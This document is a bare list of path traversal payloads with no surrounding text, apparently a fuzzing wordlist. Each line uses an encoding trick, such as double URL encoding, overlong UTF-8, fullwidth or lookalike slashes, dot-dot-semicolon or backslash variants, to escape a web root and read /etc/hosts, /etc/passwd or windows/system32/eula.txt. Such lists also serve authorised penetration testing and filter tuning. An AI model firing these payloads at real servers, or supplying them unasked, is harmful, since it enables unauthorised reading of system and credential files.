.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252fetc/hosts
....//....//....//....//....//....//....//....//....//....//....//....//etc/hosts
.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252fetc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/hosts
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc/hosts
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/hosts
..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%afetc/hosts
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/hosts
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/hosts
.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/etc/hosts
.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/etc/hosts
.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/etc/hosts
.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/etc/hosts
%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/etc/hosts
.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/etc/hosts
.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252f.%252e%252fwindows/system32/eula.txt
....//....//....//....//....//....//....//....//....//....//....//....//windows/system32/eula.txt
.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252f.%252e.%252e/%252fwindows/system32/eula.txt
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/eula.txt
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwindows/system32/eula.txt
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/system32/eula.txt
..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%af..%c4%afwindows/system32/eula.txt
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fwindows/system32/eula.txt
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/system32/eula.txt
.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/.%c0%2e/windows/system32/eula.txt
.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/.%c0%ae/windows/system32/eula.txt
.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/.%c4%ae/windows/system32/eula.txt
.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/.%e2%80%a4/windows/system32/eula.txt
%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/%e2%80%a5/windows/system32/eula.txt
.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/.\u002e/windows/system32/eula.txt
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows/system32/eula.txt
.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/.%252e%255c/windows/system32/eula.txt
..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8windows/system32/eula.txt
..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/..%ef%b9%a8/windows/system32/eula.txt
..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96..%e2%88%96windows/system32/eula.txt
..././..././..././..././..././..././..././..././etc/passwd
..././..././..././..././..././..././..././..././windows/system32/eula.txt
...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\windows\system32\eula.txt
..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/..;/windows/system32/eula.txt
..;\..;\..;\..;\..;\..;\..;\..;\..;\windows\system32\eula.txt
